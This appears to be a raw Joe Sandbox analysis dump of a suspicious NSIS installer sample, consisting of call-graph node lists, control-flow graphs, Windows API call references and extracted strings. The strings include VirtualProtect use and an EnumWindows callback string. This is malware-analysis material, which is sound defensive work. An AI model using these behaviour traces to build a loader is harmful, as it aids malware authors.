5804->5800 5804->5803 5820 404636 SendMessageW 5804->5820 5821 406682 lstrcpynW 5804->5821 5806 404472 lstrlenW 5807 4066bf 21 API calls 5806->5807 5808 404488 SetWindowTextW 5807->5808 5809 401389 2 API calls 5808->5809 5809->5788 5810->5769 5811 4044e6 CreateDialogParamW 5810->5811 5811->5769 5812 404519 5811->5812 5813 404601 22 API calls 5812->5813 5814 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5813->5814 5815 401389 2 API calls 5814->5815 5816 40456a 5815->5816 5816->5763 5817 404572 ShowWindow 5816->5817 5818 40464d SendMessageW 5817->5818 5818->5769 5819->5799 5820->5804 5821->5806 5822 401503 5823 401508 5822->5823 5825 401520 5822->5825 5824 402d89 21 API calls 5823->5824 5824->5825 5826 401a04 5827 402dab 21 API calls 5826->5827 5828 401a0b 5827->5828 5829 402dab 21 API calls 5828->5829 5830 401a14 5829->5830 5831 401a1b lstrcmpiW 5830->5831 5832 401a2d lstrcmpW 5830->5832 5833 401a21 5831->5833 5832->5833 5834 402304 5835 402dab 21 API calls 5834->5835 5836 40230a 5835->5836 5837 402dab 21 API calls 5836->5837 5838 402313 5837->5838 5839 402dab 21 API calls 5838->5839 5840 40231c 5839->5840 5841 4069df 2 API calls 5840->5841 5842 402325 5841->5842 5843 402336 lstrlenW lstrlenW 5842->5843 5847 402329 5842->5847 5845 405707 28 API calls 5843->5845 5844 405707 28 API calls 5848 402331 5844->5848 5846 402374 SHFileOperationW 5845->5846 5846->5847 5846->5848 5847->5844 5847->5848 4782 6e392a7f 4783 6e392acf 4782->4783 4784 6e392a8f VirtualProtect 4782->4784 4784->4783 5856 401d86 5857 401d99 GetDlgItem 5856->5857 5858 401d8c 5856->5858 5860 401d93 5857->5860 5859 402d89 21 API calls 5858->5859 5859->5860 5861 401dda GetClientRect LoadImageW SendMessageW 5860->5861 5863 402dab 21 API calls 5860->5863 5864 401e38 5861->5864 5866 401e44 5861->5866 5863->5861 5865 401e3d DeleteObject 5864->5865 5864->5866 5865->5866 5867 402388 5868 40238f 5867->5868 5871 4023a2 5867->5871 5869 4066bf 21 API calls 5868->5869 5870 40239c 5869->5870 5870->5871 5872 405ce2 MessageBoxIndirectW 5870->5872 5872->5871 4830 401389 4832 401390 4830->4832 4831 4013fe 4832->4831 4833 4013cb MulDiv SendMessageW 4832->4833 4833->4832 5873 402c0a SendMessageW 5874 402c24 InvalidateRect 5873->5874 5875 402c2f 5873->5875 5874->5875 5876 6e391774 5877 6e3917a3 5876->5877 5878 6e391bff 22 API calls 5877->5878 5879 6e3917aa 5878->5879 5880 6e3917bd 5879->5880 5881 6e3917b1 5879->5881 5882 6e3917e4 5880->5882 5883 6e3917c7 5880->5883 5884 6e391312 2 API calls 5881->5884 5886 6e3917ea 5882->5886 5887 6e39180e 5882->5887 5885 6e3915dd 3 API calls 5883->5885 5888 6e3917bb 5884->5888 5889 6e3917cc 5885->5889 5890 6e391654 3 API calls 5886->5890 5891 6e3915dd 3 API calls 5887->5891 5892 6e391654 3 API calls 5889->5892 5893 6e3917ef 5890->5893 5891->5888 5894 6e3917d2 5892->5894 5895 6e391312 2 API calls 5893->5895 5896 6e391312 2 API calls 5894->5896 5897 6e3917f5 GlobalFree 5895->5897 5898 6e3917d8 GlobalFree 5896->5898 5897->5888 5899 6e391809 GlobalFree 5897->5899 5898->5888 5899->5888 4855 40248f 4856 402dab 21 API calls 4855->4856 4857 4024a1 4856->4857 4858 402dab 21 API calls 4857->4858 4859 4024ab 4858->4859 4872 402e3b 4859->4872 4862 402c2f 4863 4024e3 4865 4024ef 4863->4865 4866 402d89 21 API calls 4863->4866 4864 402dab 21 API calls 4868 4024d9 lstrlenW 4864->4868 4867 40250e RegSetValueExW 4865->4867 4869 403376 48 API calls 4865->4869 4866->4865 4870 402524 RegCloseKey 4867->4870 4868->4863 4869->4867 4870->4862 4873 402e56 4872->4873 4876 40651d 4873->4876 4877 40652c 4876->4877 4878 4024bb 4877->4878 4879 406537 RegCreateKeyExW 4877->4879 4878->4862 4878->4863 4878->4864 4879->4878 5900 402910 5901 402dab 21 API calls 5900->5901 5902 402917 FindFirstFileW 5901->5902 5903 40293f 5902->5903 5907 40292a 5902->5907 5904 402948 5903->5904 5908 4065c9 wsprintfW 5903->5908 5909 406682 lstrcpynW 5904->5909 5908->5904 5909->5907 5910 6e3923e9 5911 6e392453 5910->5911 5912 6e39245e GlobalAlloc 5911->5912 5913 6e39247d 5911->5913 5912->5911 5914 401911 5915 401948 5914->5915 5916 402dab 21 API calls 5915->5916 5917 40194d 5916->5917 5918 405d8e 71 API calls 5917->5918 5919 401956 5918->5919 5920 401491 5921 405707 28 API calls 5920->5921 5922 401498 5921->5922 5923 403d12 5924 403d1d 5923->5924 5925 403d21 5924->5925 5926 403d24 GlobalAlloc 5924->5926 5926->5925 5934 401914 5935 402dab 21 API calls 5934->5935 5936 40191b 5935->5936 5937 405ce2 MessageBoxIndirectW 5936->5937 5938 401924 5937->5938 4946 402896 4947 40289d 4946->4947 4948 402bae 4946->4948 4949 402d89 21 API calls 4947->4949 4950 4028a4 4949->4950 4951 4028b3 SetFilePointer 4950->4951 4951->4948 4952 4028c3 4951->4952 4954 4065c9 wsprintfW 4952->4954 4954->4948 5939 401f17 5940 402dab 21 API calls 5939->5940 5941 401f1d 5940->5941 5942 402dab 21 API calls 5941->5942 5943 401f26 5942->5943 5944 402dab 21 API calls 5943->5944 5945 401f2f 5944->5945 5946 402dab 21 API calls 5945->5946 5947 401f38 5946->5947 5948 401423 28 API calls 5947->5948 5949 401f3f 5948->5949 5956 405ca8 ShellExecuteExW 5949->5956 5951 401f87 5952 406b21 5 API calls 5951->5952 5953 402933 5951->5953 5954 401fa4 CloseHandle 5952->5954 5954->5953 5956->5951 5957 6e3910e1 5967 6e391111 5957->5967 5958 6e3912b0 GlobalFree 5959 6e391240 GlobalFree 5959->5967 5960 6e3911d7 GlobalAlloc 5960->5967 5961 6e3912ab 5961->5958 5962 6e39135a 2 API calls 5962->5967 5963 6e39129a GlobalFree 5963->5967 5964 6e391312 2 API calls 5964->5967 5965 6e39116b GlobalAlloc 5965->5967 5966 6e391381 lstrcpyW 5966->5967 5967->5958 5967->5959 5967->5960 5967->5961 5967->5962 5967->5963 5967->5964 5967->5965 5967->5966 5968 402f98 5969 402fc3 5968->5969 5970 402faa SetTimer 5968->5970 5971 403011 5969->5971 5972 403017 MulDiv 5969->5972 5970->5969 5973 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 5972->5973 5973->5971 5975 401d1c 5976 402d89 21 API calls 5975->5976 5977 401d22 IsWindow 5976->5977 5978 401a25 5977->5978 5979 40149e 5980 4023a2 5979->5980 5981 4014ac PostQuitMessage 5979->5981 5981->5980 5982 401ba0 5983 401bf1 5982->5983 5984 401bad 5982->5984 5985 401bf6 5983->5985 5986 401c1b GlobalAlloc 5983->5986 5987 401c36 5984->5987 5990 401bc4 5984->5990 5995 4023a2 5985->5995 6003 406682 lstrcpynW 5985->6003 5989 4066bf 21 API calls 5986->5989 5988 4066bf 21 API calls 5987->5988 5987->5995 5994 40239c 5988->5994 5989->5987 6001 406682 lstrcpynW 5990->6001 5993 401c08 GlobalFree 5993->5995 5994->5995 5997 405ce2 MessageBoxIndirectW 5994->5997 5996 401bd3 6002 406682 lstrcpynW 5996->6002 5997->5995 5999 401be2 6004 406682 lstrcpynW 5999->6004 6001->5996 6002->5999 6003->5993 6004->5995 6005 406da0 6007 406c24 6005->6007 6006 40758f 6007->6006 6008 406ca5 GlobalFree 6007->6008 6009 406cae GlobalAlloc 6007->6009 6010 406d25 GlobalAlloc 6007->6010 6011 406d1c GlobalFree 6007->6011 6008->6009 6009->6006 6009->6007 6010->6006 6010->6007 6011->6010 6012 402621 6013 402dab 21 API calls 6012->6013 6014 402628 6013->6014 6017 406172 GetFileAttributesW CreateFileW 6014->6017 6016 402634 6017->6016 6018 6e391058 6020 6e391074 6018->6020 6019 6e3910dd 6020->6019 6021 6e391092 6020->6021 6022 6e3915b6 GlobalFree 6020->6022 6023 6e3915b6 GlobalFree 6021->6023 6022->6021 6024 6e3910a2 6023->6024 6025 6e3910a9 GlobalSize 6024->6025 6026 6e3910b2 6024->6026 6025->6026 6027 6e3910c7 6026->6027 6028 6e3910b6 GlobalAlloc 6026->6028 6030 6e3910d2 GlobalFree 6027->6030 6029 6e3915dd 3 API calls 6028->6029 6029->6027 6030->6019 4302 4025a3 4314 402deb 4302->4314 4306 4025b6 4307 4025c5 4306->4307 4311 402933 4306->4311 4308 4025d2 RegEnumKeyW 4307->4308 4309 4025de RegEnumValueW 4307->4309 4312 4025fa RegCloseKey 4308->4312 4310 4025f3 4309->4310 4309->4312 4310->4312 4312->4311 4315 402dab 21 API calls 4314->4315 4316 402e02 4315->4316 4317 4064ef RegOpenKeyExW 4316->4317 4318 4025ad 4317->4318 4319 402d89 4318->4319 4320 4066bf 21 API calls 4319->4320 4321 402d9e 4320->4321 4321->4306 6031 4015a8 6032 402dab 21 API calls 6031->6032 6033 4015af SetFileAttributesW 6032->6033 6034 4015c1 6033->6034 4834 401fa9 4835 402dab 21 API calls 4834->4835 4836 401faf 4835->4836 4837 405707 28 API calls 4836->4837 4838 401fb9 4837->4838 4839 405c65 2 API calls 4838->4839 4840 401fbf 4839->4840 4841 401fe2 CloseHandle 4840->4841 4844 402933 4840->4844 4849 406b21 WaitForSingleObject 4840->4849 4841->4844 4845 401fd4 4846 401fe4 4845->4846 4847 401fd9 4845->4847 4846->4841 4854 4065c9 wsprintfW 4847->4854 4850 406b3b 4849->4850 4851 406b4d GetExitCodeProcess 4850->4851 4852 406ab2 2 API calls 4850->4852 4851->4845 4853 406b42 WaitForSingleObject 4852->4853 4853->4850 4854->4841 6042 404aab 6043 404ae1 6042->6043 6044 404abb 6042->6044 6046 404668 8 API calls 6043->6046 6045 404601 22 API calls 6044->6045 6047 404ac8 SetDlgItemTextW 6045->6047 6048 404aed 6046->6048 6047->6043 6049 40202f 6050 402dab 21 API calls 6049->6050 6051 402036 6050->6051 6052 406a76 5 API calls 6051->6052 6053 402045 6052->6053 6054 402061 GlobalAlloc 6053->6054 6055 4020d1 6053->6055 6054->6055 6056 402075 6054->6056 6057 406a76 5 API calls 6056->6057 6058 40207c 6057->6058 6059 406a76 5 API calls 6058->6059 6060 402086 6059->6060 6060->6055 6064 4065c9 wsprintfW 6060->6064 6062 4020bf 6065 4065c9 wsprintfW 6062->6065 6064->6062 6065->6055 6066 40252f 6067 402deb 21 API calls 6066->6067 6068 402539 6067->6068 6069 402dab 21 API calls 6068->6069 6070 402542 6069->6070 6071 40254d RegQueryValueExW 6070->6071 6073 402933 6070->6073 6072 40256d 6071->6072 6076 402573 RegCloseKey 6071->6076 6072->6076 6077 4065c9 wsprintfW 6072->6077 6076->6073 6077->6076 6078 4021af 6079 402dab 21 API calls 6078->6079 6080 4021b6 6079->6080 6081 402dab 21 API calls 6080->6081 6082 4021c0 6081->6082 6083 402dab 21 API calls 6082->6083 6084 4021ca 6083->6084 6085 402dab 21 API calls 6084->6085 6086 4021d4 6085->6086 6087 402dab 21 API calls 6086->6087 6088 4021de 6087->6088 6089 40221d CoCreateInstance 6088->6089 6090 402dab 21 API calls 6088->6090 6093 40223c 6089->6093 6090->6089 6091 401423 28 API calls 6092 4022fb 6091->6092 6093->6091 6093->6092 6094 401a35 6095 402dab 21 API calls 6094->6095 6096 401a3e ExpandEnvironmentStringsW 6095->6096 6097 401a52 6096->6097 6099 401a65 6096->6099 6098 401a57 lstrcmpW 6097->6098 6097->6099 6098->6099 4955 4023b7 4956 4023bf 4955->4956 4959 4023c5 4955->4959 4957 402dab 21 API calls 4956->4957 4957->4959 4958 402dab 21 API calls 4960 4023d3 4958->4960 4959->4958 4959->4960 4961 402dab 21 API calls 4960->4961 4963 4023e1 4960->4963 4961->4963 4962 402dab 21 API calls 4964 4023ea WritePrivateProfileStringW 4962->4964 4963->4962 6100 404737 lstrcpynW lstrlenW 6106 4014b8 6107 4014be 6106->6107 6108 401389 2 API calls 6107->6108 6109 4014c6 6108->6109 4965 402439 4966 402441 4965->4966 4967 40246c 4965->4967 4968 402deb 21 API calls 4966->4968 4969 402dab 21 API calls 4967->4969 4970 402448 4968->4970 4971 402473 4969->4971 4973 402452 4970->4973 4974 402480 4970->4974 4977 402e69 4971->4977 4975 402dab 21 API calls 4973->4975 4976 402459 RegDeleteValueW RegCloseKey 4975->4976 4976->4974 4978 402e7d 4977->4978 4980 402e76 4977->4980 4978->4980 4981 402eae 4978->4981 4980->4974 4982 4064ef RegOpenKeyExW 4981->4982 4983 402edc 4982->4983 4984 402f91 4983->4984 4985 402ee6 4983->4985 4984->4980 4986 402eec RegEnumValueW 4985->4986 4990 402f0f 4985->4990 4987 402f76 RegCloseKey 4986->4987 4986->4990 4987->4984 4988 402f4b RegEnumKeyW 4989 402f54 RegCloseKey 4988->4989 4988->4990 4991 406a76 5 API calls 4989->4991 4990->4987 4990->4988 4990->4989 4992 402eae 6 API calls 4990->4992 4993 402f64 4991->4993 4992->4990 4994 402f86 4993->4994 4995 402f68 RegDeleteKeyW 4993->4995 4994->4984 4995->4984 6110 40173a 6111 402dab 21 API calls 6110->6111 6112 401741 SearchPathW 6111->6112 6113 40175c 6112->6113 6114 6e392d43 6115 6e392d5b 6114->6115 6116 6e39162f 2 API calls 6115->6116 6117 6e392d76 6116->6117 6118 401d3d 6119 402d89 21 API calls 6118->6119 6120 401d44 6119->6120 6121 402d89 21 API calls 6120->6121 6122 401d50 GetDlgItem 6121->6122 6123 40263d 6122->6123

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 12 40372c 5->12 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 12->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 26 403774 21->26 26->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 39 403819-40381e 35->39 40 40381f-403823 35->40 36->35 36->36 44 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->44 45 403989-4039a3 DeleteFileW call 4030d5 37->45 39->40 42 4038e4-4038f3 call 405f7e 40->42 43 403829-40382f 40->43 42->32 61 4038f5-4038f6 42->61 47 403831-403838 43->47 48 403849-403882 43->48 44->45 64 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 44->64 66 403b90-403ba0 call 403c62 OleUninitialize 45->66 67 4039a9-4039af 45->67 54 40383a-40383d 47->54 55 40383f 47->55 49 403884-403889 48->49 50 40389f-4038d9 48->50 49->50 56 40388b-403893 49->56 58 4038e1-4038e3 50->58 59 4038db-4038df 50->59 54->48 54->55 55->48 62 403895-403898 56->62 63 40389a 56->63 58->42 59->58 65 403905-403912 call 406682 59->65 61->32 62->50 62->63 63->50 64->45 64->66 65->37 77 403ba2-403bb2 call 405ce2 ExitProcess 66->77 78 403bc6-403bcc 66->78 70 4039b5-4039c0 call 405f7e 67->70 71 403a48-403a4f call 403d54 67->71 84 4039c2-4039f7 70->84 85 403a0e-403a18 70->85 80 403a54-403a58 71->80 81 403c4a-403c52 78->81 82 403bce-403be4 GetCurrentProcess OpenProcessToken 78->82 80->66 91 403c54 81->91 92 403c58-403c5c ExitProcess 81->92 87 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 82->87 88 403c1a-403c28 call 406a76 82->88 86 4039f9-4039fd 84->86 89 403a1a-403a28 call 406059 85->89 90 403a5d-403a83 call 405c4d lstrlenW call 406682 85->90 94 403a06-403a0a 86->94 95 4039ff-403a04 86->95 87->88 104 403c36-403c41 ExitWindowsEx 88->104 105 403c2a-403c34 88->105 89->66 106 403a2e-403a44 call 406682 * 2 89->106 110 403a94-403aac 90->110 111 403a85-403a8f call 406682 90->111 91->92 94->86 99 403a0c 94->99 95->94 95->99 99->85 104->81 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->81 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 126 403af2-403af4 122->126 123->126 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 126->128 129 403af6-403b00 GetFileAttributesW 126->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->66 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->66 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 00403668
                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                                                      • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403783
                                                                                      • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                                                      • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\LrBF2Z930N.exe",00000020,"C:\Users\user\Desktop\LrBF2Z930N.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403945
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403961
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\LrBF2Z930N.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                                      • wsprintfW.USER32 ref: 00403AC4
                                                                                      • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                                                      • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                                                        • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\LrBF2Z930N.exe,0042C800,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                                                        • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                                        • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                                        • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,C:\Users\user\AppData\Local\Temp\nsk82C6.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
                                                                                        • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                                                      • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                                                      • ExitProcess.KERNEL32 ref: 00403BB2
                                                                                      • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                                                      • ExitProcess.KERNEL32 ref: 00403C5C
                                                                                        • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\LrBF2Z930N.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\LrBF2Z930N.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
                                                                                      • API String ID: 1813718867-2816012605
                                                                                      • Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                                      • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                                                      • Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                                      • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 357 405d8e-405db4 call 406059 360 405db6-405dc8 DeleteFileW 357->360 361 405dcd-405dd4 357->361 362 405f4a-405f4e 360->362 363 405dd6-405dd8 361->363 364 405de7-405df7 call 406682 361->364 365 405ef8-405efd 363->365 366 405dde-405de1 363->366 372 405e06-405e07 call 405f9d 364->372 373 405df9-405e04 lstrcatW 364->373 365->362 369 405eff-405f02 365->369 366->364 366->365 370 405f04-405f0a 369->370 371 405f0c-405f14 call 4069df 369->371 370->362 371->362 381 405f16-405f2a call 405f51 call 405d46 371->381 375 405e0c-405e10 372->375 373->375 377 405e12-405e1a 375->377 378 405e1c-405e22 lstrcatW 375->378 377->378 380 405e27-405e43 lstrlenW FindFirstFileW 377->380 378->380 382 405e49-405e51 380->382 383 405eed-405ef1 380->383 397 405f42-405f45 call 405707 381->397 398 405f2c-405f2f 381->398 385 405e71-405e85 call 406682 382->385 386 405e53-405e5b 382->386 383->365 388 405ef3 383->388 399 405e87-405e8f 385->399 400 405e9c-405ea7 call 405d46 385->400 389 405ed0-405ee0 FindNextFileW 386->389 390 405e5d-405e65 386->390 388->365 389->382 396 405ee6-405ee7 FindClose 389->396 390->385 393 405e67-405e6f 390->393 393->385 393->389 396->383 397->362 398->370 402 405f31-405f40 call 405707 call 406442 398->402 399->389 403 405e91-405e9a call 405d8e 399->403 408 405ec8-405ecb call 405707 400->408 409 405ea9-405eac 400->409 402->362 403->389 408->389 412 405ec0-405ec6 409->412 413 405eae-405ebe call 405707 call 406442 409->413 412->389 413->389
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 00405DB7
                                                                                      • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 00405DFF
                                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 00405E22
                                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 00405E28
                                                                                      • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\LrBF2Z930N.exe"), ref: 00405E38
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3385472183.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3385451962.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385521995.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385544118.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3385807138.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
